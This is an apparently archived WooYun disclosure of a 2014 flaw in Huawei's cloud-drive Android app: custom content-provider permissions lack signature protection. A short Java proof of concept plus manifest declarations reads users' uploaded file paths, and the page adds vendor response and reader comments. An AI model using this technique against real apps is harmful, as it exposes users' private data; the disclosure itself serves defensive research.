当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057590

漏洞标题:华为网盘content provider组件可能泄漏用户信息

相关厂商:华为技术有限公司

漏洞作者: 瘦蛟舞

提交时间:2014-05-12 17:49

修复时间:2014-08-10 17:50

公开时间:2014-08-10 17:50

漏洞类型:用户敏感数据泄漏

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-12: 细节已通知厂商并且等待厂商处理中
2014-05-13: 厂商已经确认,细节仅向厂商公开
2014-05-16: 细节向第三方安全合作伙伴开放
2014-07-07: 细节向核心白帽子及相关领域专家公开
2014-07-17: 细节向普通白帽子公开
2014-07-27: 细节向实习白帽子公开
2014-08-10: 细节向公众公开

简要描述:

华为网盘content provider组件可能泄漏用户信息

详细说明:

1.查看配置文件,还是做了防护的

<provider android:authorities="com.huawei.dbank.v7.provider.DbankGallery" android:name="com.huawei.dbank.v7.service.data.album.GalleryProvider" android:readPermission="com.huawei.dbank.v7.provider.DbankGallery.READ_DATABASE" android:writePermission="com.huawei.dbank.v7.provider.DbankGallery.WRITE_DATABASE"/>
        <provider android:authorities="com.huawei.dbank.v7.provider.DBank" android:name=".service.data.DBankProvider" android:readPermission="com.huawei.dbank.v7.provider.DBank.READ_DATABASE" android:writePermission="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE"/>


2.但是如果在manifest中做如下权限申明依旧可以同过content provider组件访问网盘sqlite中的数据

<uses-permission android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE"/>
    <uses-permission android:name="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE"/>
    <permission android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE" android:protectionLevel="dangerous"></permission>
    <permission android:name="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE" android:protectionLevel="dangerous"></permission>


3.反编译app后查看uri

provider-uri.jpg

漏洞证明:

4.poc如下

public void dbank(View v){
		ContentResolver content = getContentResolver();
		Uri uri = Uri.parse("content://com.huawei.dbank.v7.provider.DBank/uploaditem");
		Cursor cursor = content.query(uri, null, null, null, null);
		while(cursor.moveToNext()){
			String path = cursor.getString(cursor.getColumnIndex("filePath"));
			System.out.println("path="+path);
		}


5.查看用户上传的文件路径。

uploadlist.jpg

修复方案:

版权声明:转载请注明来源 瘦蛟舞@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2014-05-13 12:05

厂商回复:

感谢白帽子提醒!不涉及文件内容泄露,产品修复中。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-14 13:16 | Coner ( 路人 | Rank:3 漏洞数:1 )

    这是一种很典型的权限泄露,自己定义了私有权限,却没有限制为同一签名才能共享权限,所以反编译之后,拿到权限的名称,就直接可以使用该权限,这种问题,貌似drozer等工具还没有支持吧,android的权限问题占了android app 漏洞的很大一部分比例

  2. 2014-12-14 14:43 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:66 | 铁甲依然在)

    @Coner 可以重新编译drozer客户端加入权限。

  3. 2014-12-14 16:12 | Coner ( 路人 | Rank:3 漏洞数:1 )

    @瘦蛟舞 是的,之前只是考虑到有这种问题,但是没有考虑到跟工具配合,THX to 瘦蛟舞 :)

  4. 2015-04-13 22:47 | chavez_wang ( 路人 | Rank:0 漏洞数:1 | 走过你来时的路)

    @瘦蛟舞 请教大牛,怎么重新编译drozer客户端呢?

  5. 2015-04-14 10:36 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:66 | 铁甲依然在)

    @chavez_wang 有源码的呀.https://github.com/mwrlabs/drozer-agent

  6. 2015-04-14 21:25 | chavez_wang ( 路人 | Rank:0 漏洞数:1 | 走过你来时的路)

    @瘦蛟舞 明白了~ 点赞!

  7. 2015-04-15 19:33 | chavez_wang ( 路人 | Rank:0 漏洞数:1 | 走过你来时的路)

    @瘦蛟舞 试了下,发现drozer-agent依赖的jdiesel在导入eclipse中后找不到com.mwr.jdiesel.api.Protobuf.Message.Argument这个类,github找了也没有,这该如何是好?

  8. 2015-04-18 22:13 | Nicky ( 普通白帽子 | Rank:477 漏洞数:68 | http://www.droidsec.cn 安卓安全中文站)

    @chavez_wang @瘦蛟舞 之前也遇到类似的问题- -好像是某个依赖包有问题?

  9. 2015-04-25 09:00 | chavez_wang ( 路人 | Rank:0 漏洞数:1 | 走过你来时的路)

    @Nicky 嗯,是jdiesel这个包的问题